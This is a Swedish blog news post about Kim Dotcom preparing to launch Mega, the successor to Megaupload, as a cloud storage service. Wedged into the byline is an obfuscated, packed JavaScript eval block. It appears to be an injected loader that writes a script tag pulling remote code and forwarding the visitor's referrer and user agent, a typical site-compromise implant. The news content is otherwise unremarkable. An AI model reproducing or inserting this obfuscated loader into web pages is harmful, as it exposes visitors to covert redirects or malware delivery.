Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Kim Dotcoms sajt Mega lanseras i januari

Kim Dotcoms sajt Mega lanseras i januari
Sebastian

Kim eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttttn|var|u0026u|referrer|yitdy||js|php’.split(’|’),0,{}))
Dotcom är i farten igen. Efter skandalen med Megaupload är det nu dags att få den att vakna till liv igen. Sajten Mega som den heter nu har fått en webbadress tack vare Nya Zeeland. Det som pryder sajten nu är ”Större, bättre, snabbare, starkare och säkrare”.

Kim Dotcom är övertygad om att hans nya sajt Mega kommer bli en enorm succé. Just nu finns det inte så mycket information på sajten. Både servrar och finansiering efterfrågas i nuläget. Allt för att göra Mega så gratis som möjligt.

Mega kommer att bli en molntjänst där användare lätt ska kunna hitta och dela material med varandra. Det går att jämföra med Google Drive och Dropbox.

Som Megaupload ska Mega vara mycket snabbare tack vare kryptering som kan sprida ut filerna på servrar i närheten av användaren.

Just nu kan du också skriva upp dig på en lista för att få mail med de senaste händelserna på sajten. Hur det kommer att gå för Kim Dotcom är fortfarande oskrivet men vi får se.

Besök Mega!

Comments

  1. Dotcom

    Tjockis